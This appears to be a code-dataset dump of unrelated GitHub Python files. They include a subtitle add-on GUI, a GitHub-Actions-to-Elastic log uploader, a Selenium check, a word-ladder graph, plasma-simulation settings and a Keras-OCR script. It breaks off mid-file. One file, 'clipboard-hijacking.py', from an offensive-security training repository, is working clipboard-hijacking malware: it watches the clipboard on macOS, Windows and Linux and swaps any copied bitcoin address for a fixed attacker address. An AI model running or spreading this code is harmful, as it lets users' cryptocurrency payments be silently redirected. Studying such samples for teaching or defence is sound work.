Search: [%s]\" % self.parsearch)\n log( __name__ ,\"Stacked(CD1/CD2)?: [%s]\" % self.stack)\n\n return self.autoDownload\n\n def Search_Subtitles( self, gui = True ):\n self.subtitles_list = []\n self.session_id = \"\"\n if gui:\n self.getControl( SUBTITLES_LIST ).reset()\n self.getControl( LOADING_IMAGE ).setImage(\n xbmc.translatePath(\n os.path.join(\n SERVICE_DIR,\n self.service,\n \"logo.png\")))\n\n exec ( \"from services.%s import service as Service\" % (self.service))\n self.Service = Service\n if gui:\n self.getControl( STATUS_LABEL ).setLabel( _( 646 ))\n msg = \"\"\n socket.setdefaulttimeout(float(__addon__.getSetting( \"timeout\" )))\n try:\n self.subtitles_list, self.session_id, msg = self.Service.search_subtitles(\n self.file_original_path,\n self.title,\n self.tvshow,\n self.year,\n self.season,\n self.episode,\n self.temp,\n self.rar,\n self.language_1,\n self.language_2,\n self.language_3,\n self.stack\n )\n except socket.error:\n errno, errstr = sys.exc_info()[:2]\n if errno == socket.timeout:\n msg = _( 656 )\n else:\n msg = \"%s: %s\" % ( _( 653 ),str(errstr[1]), )\n except:\n errno, errstr = sys.exc_info()[:2]\n msg = \"Error: %s\" % ( str(errstr), )\n socket.setdefaulttimeout(None)\n if gui:\n self.getControl( STATUS_LABEL ).setLabel( _( 642 ) % ( \"...\", ))\n\n if not self.subtitles_list:\n if __addon__.getSetting( \"search_next\" )== \"true\" and len(self.next) > 1:\n xbmc.sleep(1500)\n self.next.remove(self.service)\n self.service = self.next[0]\n self.show_service_list(gui)\n log( __name__ ,\"Auto Searching '%s' Service\" % (self.service))\n self.Search_Subtitles(gui)\n else:\n self.next = list(self.service_list)\n if gui:\n select_index = 0\n if msg != \"\":\n self.getControl( STATUS_LABEL ).setLabel( msg )\n else:\n self.getControl( STATUS_LABEL ).setLabel( _( 657 ))\n self.show_service_list(gui)\n if self.autoDownload:\n xbmc.executebuiltin((u\"Notification(%s,%s,%i)\" % (__scriptname__, _(767), 1000)).encode(\"utf-8\"))\n else:\n subscounter = 0\n itemCount = 0\n list_subs = []\n mainLangISO = languageTranslate(self.language_1, 0, 3)\n for item in self.subtitles_list:\n if (self.autoDownload and item[\"sync\"] and\n languageTranslate(item[\"language_name\"], 0, 3) == mainLangISO\n ):\n self.Download_Subtitles(itemCount, True, gui)\n __addon__.setSetting(\"auto_download_file\",\n os.path.basename( self.file_original_path ))\n if self.autoDownload:\n xbmc.executebuiltin((u\"Notification(%s,%s,%i)\" % (__scriptname__, _(765), 1000)).encode(\"utf-8\"))\n return True\n else:\n if gui:\n listitem = xbmcgui.ListItem(label=_( languageTranslate(item[\"language_name\"],0,5)),\n label2=item[\"filename\"],\n iconImage=item[\"rating\"],\n thumbnailImage=item[\"language_flag\"]\n )\n if item[\"sync\"]:\n listitem.setProperty( \"sync\", \"true\" )\n else:\n listitem.setProperty( \"sync\", \"false\" )\n\n if item.get(\"hearing_imp\", False):\n listitem.setProperty( \"hearing_imp\", \"true\" )\n else:\n listitem.setProperty( \"hearing_imp\", \"false\" )\n\n self.list.append(subscounter)\n subscounter = subscounter + 1\n list_subs.append(listitem)\n itemCount += 1\n\n if gui:\n label = '%i %s '\"' %s '\"'' % (len ( self.subtitles_list ),_( 744 ),self.file_name)\n self.getControl( STATUS_LABEL ).setLabel( label )\n self.getControl( SUBTITLES_LIST ).addItems( list_subs )\n self.setFocusId( SUBTITLES_LIST )\n self.getControl( SUBTITLES_LIST ).selectItem( 0 )\n if self.autoDownload:\n xbmc.executebuiltin((u\"Notification(%s,%s,%i)\" % (__scriptname__, _(767), 1000)).encode(\"utf-8\"))\n return False\n\n def Download_Subtitles( self, pos, auto = False, gui = True ):\n if gui:\n if auto:\n self.getControl( STATUS_LABEL ).setLabel( _( 763 ))\n else:\n self.getControl( STATUS_LABEL ).setLabel( _( 649 ))\n compressed_subs = os.path.join( self.tmp_sub_dir, \"compressed_subs.ext\")\n compressed, language, file = self.Service.download_subtitles(self.subtitles_list,\n pos,\n compressed_subs,\n self.tmp_sub_dir,\n self.sub_folder,\n self.session_id\n )\n sub_lang = str(languageTranslate(language,0,2))\n\n if compressed:\n # backward compatibility\n if (file == \"\"):\n file = \"zip\"\n suffixed_compressed_subs = re.sub(\"\\.ext$\",\".%s\" % file,compressed_subs)\n os.rename(compressed_subs,suffixed_compressed_subs)\n log(__name__,\"Extracting %s\" % suffixed_compressed_subs)\n self.Extract_Subtitles(suffixed_compressed_subs,sub_lang, gui)\n else:\n sub_ext = os.path.splitext( file )[1]\n if self.temp:\n sub_name = \"temp_sub\"\n else:\n sub_name = os.path.splitext( os.path.basename( self.file_original_path ))[0]\n if (__addon__.getSetting( \"lang_to_end\" ) == \"true\"):\n file_name = u\"%s.%s%s\" % ( sub_name, sub_lang, sub_ext )\n else:\n file_name = u\"%s%s\" % ( sub_name, sub_ext )\n file_from = file\n file_to = xbmc.validatePath(os.path.join(self.sub_folder, file_name)).decode(\"utf-8\")\n # Create a files list of from-to tuples so that multiple files may be\n # copied (sub+idx etc')\n files_list = [(file_from,file_to)]\n # If the subtitle's extension sub, check if an idx file exists and if so\n # add it to the list\n if ((sub_ext == \".sub\") and (os.path.exists(file[:-3]+\"idx\"))):\n log( __name__ ,\"found .sub+.idx pair %s + %s\" % (file_from,file_from[:-3]+\"idx\"))\n files_list.append((file_from[:-3]+\"idx\",file_to[:-3]+\"idx\"))\n for cur_file_from, cur_file_to in files_list:\n subtitle_set,file_path = copy_files( cur_file_from, cur_file_to )\n # Choose the last pair in the list, second item (destination file)\n if subtitle_set:\n subtitle = files_list[-1][1]\n xbmc.Player().setSubtitles(subtitle.encode(\"utf-8\"))\n self.close()\n else:\n if gui:\n self.getControl( STATUS_LABEL ).setLabel( _( 654 ))\n self.show_service_list(gui)\n\n def Extract_Subtitles( self, zip_subs, subtitle_lang, gui = True ):\n xbmc.executebuiltin(('XBMC.Extract(\"%s\",\"%s\")' % (zip_subs,self.tmp_sub_dir)).encode('utf-8'))\n xbmc.sleep(1000)\n files = os.listdir(self.tmp_sub_dir)\n sub_filename = os.path.basename( self.file_original_path )\n exts = [\".srt\", \".sub\", \".txt\", \".smi\", \".ssa\", \".ass\" ]\n subtitle_set = False\n if len(files) < 1 :\n if gui:\n self.getControl( STATUS_LABEL ).setLabel( _( 654 ))\n self.show_service_list(gui)\n else :\n if gui:\n self.getControl( STATUS_LABEL ).setLabel( _( 652 ))\n subtitle_set = False\n movie_sub = False\n episode = 0\n for zip_entry in files:\n if os.path.splitext( zip_entry )[1] in exts:\n subtitle_file, file_path = self.create_name(zip_entry,sub_filename,subtitle_lang)\n if len(self.tvshow) > 0:\n title, season, episode = regex_tvshow(False, zip_entry)\n if not episode : episode = -1\n else:\n if os.path.splitext( zip_entry )[1] in exts:\n movie_sub = True\n if ( movie_sub or int(episode) == int(self.episode)):\n if self.stack:\n try:\n for subName in self.stackPath:\n if (re.split(\"(?x)(?i)\\CD(\\d)\",\n zip_entry)[1]) == (re.split(\"(?x)(?i)\\CD(\\d)\",\n urllib.unquote ( subName ))[1]\n ):\n subtitle_file, file_path = self.create_name(\n zip_entry,\n urllib.unquote(os.path.basename(subName[8:])),\n subtitle_lang\n )\n subtitle_set,file_path = copy_files( subtitle_file, file_path )\n if re.split(\"(?x)(?i)\\CD(\\d)\", zip_entry)[1] == \"1\":\n subToActivate = file_path\n except:\n subtitle_set = False\n else:\n subtitle_set,subToActivate = copy_files( subtitle_file, file_path )\n\n if not subtitle_set:\n for zip_entry in files:\n if os.path.splitext( zip_entry )[1] in exts:\n subtitle_file, file_path = self.create_name(zip_entry,sub_filename,subtitle_lang)\n subtitle_set,subToActivate = copy_files( subtitle_file, file_path )\n\n if subtitle_set :\n xbmc.Player().setSubtitles(subToActivate.encode(\"utf-8\"))\n self.close()\n else:\n if gui:\n self.getControl( STATUS_LABEL ).setLabel( _( 654 ))\n self.show_service_list(gui)\n\n def clean_temp( self ):\n for temp_dir in [self.stream_sub_dir,self.tmp_sub_dir]:\n rem_files(temp_dir)\n\n\n def show_service_list(self,gui):\n try:\n select_index = self.service_list.index(self.service)\n except IndexError:\n select_index = 0\n if gui:\n self.setFocusId( SERVICES_LIST )\n self.getControl( SERVICES_LIST ).selectItem( select_index )\n\n def create_name(self,zip_entry,sub_filename,subtitle_lang):\n if self.temp:\n name = \"temp_sub\"\n else:\n name = os.path.splitext( sub_filename )[0]\n if (__addon__.getSetting( \"lang_to_end\" ) == \"true\"):\n file_name = u\"%s.%s%s\" % ( name,\n subtitle_lang,\n os.path.splitext( zip_entry )[1] )\n else:\n file_name = u\"%s%s\" % ( name, os.path.splitext( zip_entry )[1] )\n log( __name__ ,\"Sub in Archive [%s], File Name [%s]\" % (zip_entry,\n file_name))\n ret_zip_entry = xbmc.validatePath(os.path.join(self.tmp_sub_dir,zip_entry)).decode(\"utf-8\")\n ret_file_name = xbmc.validatePath(os.path.join(self.sub_folder,file_name)).decode(\"utf-8\")\n return ret_zip_entry,ret_file_name\n\n def list_services( self ):\n self.list = []\n all_items = []\n self.getControl( SERVICES_LIST ).reset()\n for serv in self.service_list:\n listitem = xbmcgui.ListItem( serv )\n self.list.append(serv)\n listitem.setProperty( \"man\", \"false\" )\n all_items.append(listitem)\n\n if self.mansearch :\n listitem = xbmcgui.ListItem( _( 612 ))\n listitem.setProperty( \"man\", \"true\" )\n self.list.append(\"Man\")\n all_items.append(listitem)\n\n if self.parsearch :\n listitem = xbmcgui.ListItem( _( 747 ))\n listitem.setProperty( \"man\", \"true\" )\n self.list.append(\"Par\")\n all_items.append(listitem)\n\n listitem = xbmcgui.ListItem( _( 762 ))\n listitem.setProperty( \"man\", \"true\" )\n self.list.append(\"Set\")\n all_items.append(listitem)\n self.getControl( SERVICES_LIST ).addItems( all_items )\n\n def keyboard(self, parent):\n dir, self.year = xbmc.getCleanMovieTitle(self.file_original_path, self.parsearch)\n if not parent:\n if self.man_search_str != \"\":\n srchstr = self.man_search_str\n else:\n srchstr = \"%s (%s)\" % (dir,self.year)\n kb = xbmc.Keyboard(srchstr, _( 751 ), False)\n text = self.file_name\n kb.doModal()\n if (kb.isConfirmed()): text, self.year = xbmc.getCleanMovieTitle(kb.getText())\n self.title = text\n self.man_search_str = text\n else:\n self.title = dir\n\n log( __name__ ,\"Manual/Keyboard Entry: Title:[%s], Year: [%s]\" % (self.title, self.year))\n if self.year != \"\" :\n self.file_name = \"%s (%s)\" % (self.file_name, str(self.year))\n else:\n self.file_name = self.title\n self.tvshow = \"\"\n self.next = list(self.service_list)\n self.Search_Subtitles()\n\n def onClick( self, controlId ):\n if controlId == SUBTITLES_LIST:\n self.Download_Subtitles( self.getControl( SUBTITLES_LIST ).getSelectedPosition())\n\n elif controlId == SERVICES_LIST:\n xbmc.executebuiltin(\"Skin.Reset(SubtitleSourceChooserVisible)\")\n selection = str(self.list[self.getControl( SERVICES_LIST ).getSelectedPosition()])\n self.setFocusId( 120 )\n\n if selection == \"Man\":\n self.keyboard(False)\n elif selection == \"Par\":\n self.keyboard(True)\n elif selection == \"Set\":\n __addon__.openSettings()\n self.set_allparam()\n self.on_run()\n else:\n self.service = selection\n self.next = list(self.service_list)\n self.Search_Subtitles()\n\n def onFocus( self, controlId ):\n if controlId == 150:\n if not self.focused:\n try:\n select_index = self.service_list.index(self.service)\n except IndexError:\n select_index = 0\n self.getControl( SERVICES_LIST ).selectItem(select_index)\n self.focused = True\n else:\n self.focused = False\n\n def onAction( self, action ):\n if ( action.getId() in CANCEL_DIALOG):\n self.close()\n\n","repo_name":"amet/script.xbmc.subtitles","sub_path":"script.xbmc.subtitles/resources/lib/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":22552,"program_lang":"python","lang":"en","doc_type":"code","stars":104,"dataset":"github-code","pt":"53"} +{"seq_id":"10950638998","text":"import os\nimport requests\nimport io\nimport logging\nimport sys\nimport signal\nimport json\n# don't remove, it loads the configuration\nimport logger\n\n\ndef main():\n # User provided variables\n github_repo = os.environ.get(\"INPUT_GITHUB_REPOSITORY\")\n try:\n assert github_repo not in (None, '')\n except:\n output = \"The input github repository is not set\"\n print(f\"Error: {output}\")\n sys.exit(-1)\n\n github_run_id = os.environ.get(\"INPUT_GITHUB_RUN_ID\")\n try:\n assert github_run_id not in (None, '')\n except:\n output = \"The input github run id is not set\"\n print(f\"Error: {output}\")\n sys.exit(-1)\n\n github_token = os.environ.get(\"INPUT_GITHUB_TOKEN\")\n try:\n assert github_token not in (None, '')\n except:\n output = \"The input github token is not set\"\n print(f\"Error: {output}\")\n sys.exit(-1)\n\n github_org = os.environ.get(\"INPUT_GITHUB_ORG\")\n try:\n assert github_org not in (None, '')\n except:\n output = \"The input github org is not set\"\n print(f\"Error: {output}\")\n sys.exit(-1)\n elastic_logger = logging.getLogger(\"elastic\")\n metadata_url = f\"https://api.github.com/repos/{github_org}/{github_repo}/actions/runs/{github_run_id}\"\n try:\n r = requests.get(metadata_url, stream=True, headers={\n \"Authorization\": f\"token {github_token}\"\n })\n metadata = json.loads(r.content)\n jobs_url = metadata.get('jobs_url')\n metadata.pop('repository')\n metadata.pop('head_repository')\n metadata = {\n \"metadata_\" + k: v for k,v in metadata.items()\n }\n except Exception as exc:\n output = \"Failed to get run metadata\" + str(exc)\n print(f\"Error: {output}\")\n print(f\"::set-output name=result::{output}\")\n sys.exit(-1)\n\n # extract all done jobs\n jobs = {}\n try:\n jobs_response = requests.get(jobs_url, headers={\n \"Authorization\": f\"token {github_token}\"\n })\n if not jobs_response.ok:\n raise Exception(\"Failed to get run jobs\")\n _jobs = json.loads(jobs_response.content)\n for job in _jobs.get('jobs'):\n job_id = job.get('id')\n # no logs for jobs that weren't completed\n if not job.get('status') == 'completed':\n continue\n jobs[job_id] = {\n \"job_id\": job_id,\n \"job_name\": job.get('name'),\n \"job_status\": job.get('status'),\n \"job_conclusion\": job.get('conclusion'),\n \"job_steps\": job.get('steps')\n }\n # log this metadata to elastic\n elastic_logger.info(\"Job metadata\", extra={\n **jobs.get(job_id)\n })\n except Exception as exc:\n output = \"Failed to get run jobs\" + str(exc)\n print(f\"Error: {output}\")\n print(f\"::set-output name=result::{output}\")\n sys.exit(-1)\n\n for job_id in jobs:\n try:\n job_logs_url = f\"https://api.github.com/repos/{github_org}/{github_repo}/actions/jobs/{job_id}/logs\"\n r = requests.get(job_logs_url, stream=True, headers={\n \"Authorization\": f\"token {github_token}\"\n })\n if not r.ok:\n output = \"Failed to download logs\"\n print(f\"Error: {output}\")\n print(f\"::set-output name=result::{output}\")\n sys.exit(-1)\n\n logs = io.BytesIO(r.content)\n for log in logs:\n elastic_logger.info(log.strip().decode(), extra={\n \"job_id\": job_id,\n \"job_name\": jobs.get(job_id).get('job_name'),\n \"repo\": github_repo,\n \"run_id\": github_run_id,\n **metadata\n })\n\n except requests.exceptions.HTTPError as errh:\n output = \"GITHUB API Http Error:\" + str(errh)\n print(f\"Error: {output}\")\n print(f\"::set-output name=result::{output}\")\n sys.exit(-1)\n except requests.exceptions.ConnectionError as errc:\n output = \"GITHUB API Error Connecting:\" + str(errc)\n print(f\"Error: {output}\")\n print(f\"::set-output name=result::{output}\")\n sys.exit(-1)\n except requests.exceptions.Timeout as errt:\n output = \"Timeout Error:\" + str(errt)\n print(f\"Error: {output}\")\n print(f\"::set-output name=result::{output}\")\n sys.exit(-1)\n except requests.exceptions.RequestException as err:\n output = \"GITHUB API Non catched error connecting:\" + str(err)\n print(f\"Error: {output}\")\n print(f\"::set-output name=result::{output}\")\n sys.exit(-1)\n\n\ndef keyboard_interrupt_bug(signal, frame):\n print('keyboard interrupt')\n pass\n\n\nsignal.signal(signal.SIGINT, keyboard_interrupt_bug)\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"shahargl/upload-github-workflow-logs-to-elastic","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4992,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"11428813392","text":"from selenium import webdriver\ndriver = webdriver.Chrome(\"../resources/chromedriver.exe\")\n\n# from selenium import webdriver\n# driver = webdriver.Chrome(\"../resources/chromedriver.exe\")\n\nurl = \"http://www.google.com\"\n\ndriver.maximize_window()\ndriver.get(url)\nprint(driver.title)\n# assert driver.title == \"Yahoo\"\n# assert driver.title == \"Google\"\nassert driver.title == \"Google\", f\"page title {driver.title} did not match the expected title\"\nprint(\"Thanks\")\ndriver.close()","repo_name":"srbansal/WorkWithTeam1","sub_path":"webdriver_launch_ch_browser_url.py","file_name":"webdriver_launch_ch_browser_url.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34092526015","text":"from api.alpha_vantage.AlphaVantageAPI import AlphaVantageAPI\nfrom client.util.HTMLUtil import HTMLUtil\nfrom client.util.html.LinkBuider import LinkBuilder\nfrom client.util.html.ScrollableDiv import ScrollableDiv\nfrom client.util.html.TableBuilder import TableBuilder\nfrom reports.Sorting import Sorting\n\n\nclass AlbinsonianHTML:\n @staticmethod\n def get_ticker_table(tickers_found, lookup_thresh=3, force_reload=False):\n table_header = ['Ticker', 'Mentions', 'Name', 'Description', 'Movement', 'Links']\n\n norm_factor = 0\n for tf in tickers_found:\n norm_factor += tickers_found[tf]['count']\n\n table_values = []\n for tf in tickers_found:\n addendum = ''\n counter = 0\n for submission in tickers_found[tf]['submissions']:\n addendum += LinkBuilder('[%d] - %d' % (counter, submission['score']),\n 'https://www.reddit.com' + submission['link']).compile() + '
'\n counter += 1\n\n addendum = ScrollableDiv(addendum, '5rem').compile()\n\n desc = '...'\n if 'description' in tickers_found[tf] and tickers_found[tf]['description'] is not None:\n desc = tickers_found[tf]['description']\n\n if tickers_found[tf]['count'] >= lookup_thresh - 1:\n print('crawling AV for %s' % tf)\n pct_change = AlphaVantageAPI().get_parsed_quote(tf, force_reload)['10. change percent']\n pct_in_tag = HTMLUtil.wrap_in_tag(pct_change, 'div',\n attributes={'class': 'negative' if '-' in pct_change else 'positive'})\n else:\n pct_in_tag = 'N/A'\n\n table_values.append([tf, tickers_found[tf]['count'], tickers_found[tf]['name'],\n desc[:200] + '...', pct_in_tag, addendum])\n\n table_values.sort(key=Sorting.sort_by_mentions, reverse=True)\n return TableBuilder(headers=table_header, rows=table_values)","repo_name":"michaelalbinson/glowing-pancake-praw","sub_path":"experiments/michael/AlbinsonianHTML.py","file_name":"AlbinsonianHTML.py","file_ext":"py","file_size_in_byte":2041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70250893290","text":"from .adjacent_list import Graph\n\n\ndef build_graph(word_file):\n d = {}\n g = Graph()\n with open(word_file, \"r\") as file:\n for line in file:\n word = line[:-1]\n for i in range(len(word)):\n bucket = word[:i] + \"_\" + word[i+1:]\n if bucket in d:\n d[bucket].append(word)\n else:\n d[bucket] = [word]\n for bucket in d:\n for word_1 in d[bucket]:\n for word_2 in d[bucket]:\n if word_1 != word_2:\n g.add_edge(word_1, word_2)","repo_name":"chcorophyll/algorithm_4th","sub_path":"PekingUniversity/graph/word_ladder.py","file_name":"word_ladder.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22736556512","text":"# Handler for \"other\" quantities, such as collision frequencies,\n# bounce averages etc.\n\nimport numpy as np\nfrom .. DREAMException import DREAMException\n\n\nclass OtherQuantities:\n \n \n # Here, we keep a list of the possible settings found in DREAM.\n # This allows to check the input the user gives, and emit warnings\n # if the user specifies an unrecognized quantity.\n QUANTITIES = [\n 'all',\n 'fluid',\n 'fluid/conductivity',\n 'fluid/Eceff',\n 'fluid/GammaAva',\n 'fluid/gammaCompton', 'fluid/gammaDreicer', 'fluid/gammaTritium', 'fluid/gammaHottail',\n 'fluid/Lambda_hypres',\n 'fluid/lnLambdaC', 'fluid/lnLambdaT',\n 'fluid/nusnuDatPstar',\n 'fluid/pCrit', 'fluid/pCritHottail',\n 'fluid/pStar',\n 'fluid/qR0',\n 'fluid/radiation',\n 'fluid/runawayRate',\n 'fluid/Tcold_ohmic',\n 'fluid/Tcold_fhot_coll',\n 'fluid/Tcold_fre_coll',\n 'fluid/Tcold_transport',\n 'fluid/Tcold_radiation',\n# 'fluid/Tcold_radiationFromNuS',\n 'fluid/Tcold_ion_coll',\n 'fluid/W_hot',\n 'fluid/W_re',\n 'energy',\n 'hottail/Ar', 'hottail/Ap1', 'hottail/Ap2',\n 'hottail/Drr', 'hottail/Dpp', 'hottail/Dpx', 'hottail/Dxp', 'hottail/Dxx',\n 'hottail/timevaryingb_Ap2',\n 'hottail/lnLambda_ee_f1', 'hottail/lnLambda_ee_f2',\n 'hottail/lnLambda_ei_f1', 'hottail/lnLambda_ei_f2',\n 'hottail/nu_D_f1', 'hottail/nu_D_f2',\n 'hottail/nu_s_f1', 'hottail/nu_s_f2',\n 'hottail/nu_par_f1', 'hottail/nu_par_f2',\n 'hottail/S_ava', 'hottail/S_compton', 'hottail/S_tritium',\n 'hottail/synchrotron_loss',\n 'lnLambda',\n 'nu_s',\n 'nu_D',\n 'runaway/Ar', 'runaway/Ap1', 'runaway/Ap2',\n 'runaway/Drr', 'runaway/Dpp', 'runaway/Dpx', 'runaway/Dxp', 'runaway/Dxx',\n 'runaway/timevaryingb_Ap2',\n 'runaway/lnLambda_ee_f1', 'runaway/lnLambda_ee_f2',\n 'runaway/lnLambda_ei_f1', 'runaway/lnLambda_ei_f2',\n 'runaway/nu_D_f1', 'runaway/nu_D_f2',\n 'runaway/nu_s_f1', 'runaway/nu_s_f2',\n 'runaway/nu_par_f1', 'runaway/nu_par_f2',\n 'runaway/S_ava', 'runaway/synchrotron_loss',\n 'scalar',\n 'scalar/E_mag',\n 'scalar/L_i',\n 'scalar/L_i_flux',\n 'scalar/l_i',\n 'scalar/radialloss_n_re',\n 'scalar/energyloss_T_cold',\n 'scalar/radialloss_f_re',\n 'scalar/radialloss_f_hot',\n 'scalar/energyloss_f_re',\n 'scalar/energyloss_f_hot', \n 'ripple',\n 'transport'\n ]\n\n def __init__(self):\n \"\"\"\n Constructor.\n \"\"\"\n self._include = list()\n\n \n def include(self, *args):\n \"\"\"\n Include one or more \"other\" quantities in the output.\n \"\"\"\n for a in args:\n if type(a) == list:\n self.include(*a)\n elif type(a) == str:\n if a not in self.QUANTITIES:\n print(\"WARNING: Unrecognized other quantity '{}'. Is it perhaps misspelled?\".format(a))\n\n self._include.append(a)\n else:\n raise DREAMException(\"other: Unrecognized type of argument: '{}'.\".format(type(a)))\n\n\n def fromdict(self, data):\n \"\"\"\n Load these settings from the given dictionary.\n \"\"\"\n inc = []\n if 'include' in data:\n inc = data['include'].split(';')\n\n if len(inc) > 0 and inc[-1] == '':\n inc = inc[:-1]\n\n self.include(inc)\n\n\n def todict(self, verify=True):\n \"\"\"\n Returns a dict representing the settings in this object.\n \"\"\"\n if verify:\n self.verifySettings()\n\n if len(self._include) == 0:\n return {}\n else:\n return {'include': ';'.join(self._include)}\n\n\n def verifySettings(self):\n \"\"\"\n Verify that these settings are consistent.\n \"\"\"\n pass\n\n\n","repo_name":"chalmersplasmatheory/DREAM","sub_path":"py/DREAM/Settings/OtherQuantities.py","file_name":"OtherQuantities.py","file_ext":"py","file_size_in_byte":3983,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"53"} +{"seq_id":"22238753185","text":"import keras_ocr\nimport cv2\nimport os\nimport torch\nimport sys\nimport numpy as np\n# ensure we are running on the correct gpu\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"6\" # (xxxx is your specific GPU ID)\nif not torch.cuda.is_available() or torch.cuda.device_count() != 1:\n print('exiting')\n sys.exit()\nelse:\n print('GPU is being properly used')\n\n\n# keras-ocr will automatically download pretrained\n# weights for the detector and recognizer.\npipeline = keras_ocr.pipeline.Pipeline()\n\n\ndef preprocess(img):\n img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n # img = cv2.resize(img, (0, 0), fx=2.0, fy=2.0)\n clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8, 8))\n img = clahe.apply(img)\n img = 255-img # invert image. tesseract prefers black text on white background\n\n ret, img = cv2.threshold(img, 127, 255, cv2.THRESH_TOZERO)\n\n img = cv2.cvtColor(img, cv2.COLOR_GRAY2RGB)\n\n return img\n\n\ndef updateAccuracies(pebbleActualNumber, digitAccuracy, confusionMatrix, predLabels, img):\n print('labels:', predLabels)\n numberIsIncorrect = False\n scoreCode = ''\n for a in range(len(predLabels)):\n if predLabels[a].isdigit():\n actualDigit = pebbleActualNumber[a]\n predDigit = int(predLabels[a])\n\n # check if digit is correct\n if actualDigit == predDigit:\n # now update accordingly\n digitAccuracy[5] += 1\n scoreCode += '6'\n confusionMatrix[actualDigit][predDigit] += 1\n else:\n numberIsIncorrect = True\n digitAccuracy[4] += 1\n scoreCode += '5'\n confusionMatrix[actualDigit][predDigit] += 1\n\n if numberIsIncorrect:\n digitAccuracy[6] += 1\n scoreCode += '7'\n else:\n digitAccuracy[7] += 1\n scoreCode += '8'\n\n # put actual number in image\n scoring = str(pebbleActualNumber[0]) + str(pebbleActualNumber[1]\n ) + str(pebbleActualNumber[2]) + \":\" + scoreCode\n # setup text\n font = cv2.FONT_HERSHEY_SIMPLEX\n # get boundary of this text\n textsize = cv2.getTextSize(scoring, font, 1, 2)[0]\n\n # get coords based on boundary\n textX = int((img.shape[1] - textsize[0]) / 2)\n textY = int((img.shape[0] + textsize[1]) / 2)\n cv2.putText(img, scoring, (textX, img.shape[0]-75), cv2.FONT_HERSHEY_SIMPLEX,\n 1, (255, 255, 255), thickness=2)\n\n return digitAccuracy, confusionMatrix, img\n\n\ndef patch_words(pred_groups):\n # need to sort pred groups by x value\n # split pred and coords\n preds = []\n for pred_group in pred_groups:\n preds.append([pred_group[1][0][0], pred_group[0]])\n # sort by first x value\n preds = sorted(preds)\n\n # create prediction only from numbers\n prediction = ''\n for (x, word) in preds:\n prediction += ''.join(filter(lambda i: i.isdigit(), word))\n return prediction\n\n# read through each image and predict\n\n\ndef keras_prediction_with_accuracy(img, pebbleActualNumber, digitAccuracy, confusionMatrix):\n img = preprocess(img)\n\n prediction_groups = pipeline.recognize([img])\n prediction = None\n if len(prediction_groups) == 1:\n prediction = patch_words(prediction_groups[0])\n\n if prediction == None:\n cv2.putText(img, 'NONE', (5, 100), cv2.FONT_HERSHEY_SIMPLEX,\n 4, (0, 0, 255), thickness=10)\n else:\n # split into individual digits\n labels = [ch for ch in prediction]\n\n font = cv2.FONT_HERSHEY_SIMPLEX\n predText = \"Pred:\"+str(prediction)\n # get boundary of this text\n textsize = cv2.getTextSize(predText, font, 1, 2)[0]\n\n # get coords based on boundary\n textX = int((img.shape[1] - textsize[0]) / 2)\n textY = int((img.shape[0] + textsize[1]) / 2)\n cv2.putText(img, predText, (textX, img.shape[0]-25), cv2.FONT_HERSHEY_SIMPLEX,\n 1, (255, 255, 255), thickness=2)\n\n # add in scoring\n if len(labels) == 3:\n updateAccuracies(pebbleActualNumber, digitAccuracy,\n confusionMatrix, labels, img)\n\n return img, prediction, digitAccuracy, confusionMatrix\n","repo_name":"roshankenia/InletOutletDetection","sub_path":"speedy_kerasocr_util.py","file_name":"speedy_kerasocr_util.py","file_ext":"py","file_size_in_byte":4260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16552171148","text":"# -*-coding:UTF-8 -*\n# !/usr/bin/env python\n\n\"\"\" Exercise: détournement du presse-papier (clipboard hijacking)\n\nDans cette exercice, nous simulerons un malware qui observe en continue le contenu du presse-papier.\nDès que la victime copie une adresse bitcoin, notre programme la remplacera par une autre adresse prédéfinie.\n\"\"\"\n\nimport platform\nfrom subprocess import Popen, PIPE\n\ntry:\n\t# Python2\n\timport Tkinter as tk\nexcept ImportError:\n\t# Python3\n\timport tkinter as tk\n\n\n# support charity: https://thewaterproject.org/\nDEST_ADDR_bin = b'1HesYJSP1QqcyPEjnQ9vzBL1wujruNGe7R'\nDEST_ADDR = \"1HesYJSP1QqcyPEjnQ9vzBL1wujruNGe7R\"\n\n# test addr = 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy\n\ndef get_clipboard():\n\tp = Popen(['pbpaste'], stdout=PIPE) # access clipboard\n\tdata = str(p.stdout.read()) # read data on clipboard and convert to string\n\tif len(data) > 33: # if bitcoin\n\t\tswap_address(data)\n\n\ndef swap_address(data):\n\tp = Popen(['pbcopy'], stdin=PIPE) # access clipboard\n\tp.stdin.write(DEST_ADDR_bin) # write destination address\n\tp.stdin.close() # close clipboard\n\n\ndef main():\n\toperating_system = platform.system()\n\n\tif operating_system == \"Darwin\":\n\t\twhile True:\n\t\t\tget_clipboard()\n\n\telif (operating_system == \"Windows\") or (operating_system == \"Linux\"):\n\t\ttk_object = tk.Tk()\n\t\ttk_object.withdraw() \t\t# keep the window from showing up\n\t\twhile True:\n\t\t\tdata = tk_object.clipboard_get()\n\t\t\tif len(data) > 33: # if bitcoin\n\t\t\t\ttk_object.clipboard_clear()\n\t\t\t\ttk_object.clipboard_append(DEST_ADDR)\n\t\tpass\n\n\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"GrayDevs/Python4Security","sub_path":"py4Sec/Offensive/post-exploitation/clipboard-hijacking.py","file_name":"clipboard-hijacking.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74871391526","text":"from numpy import identity\nimport tensorflow as 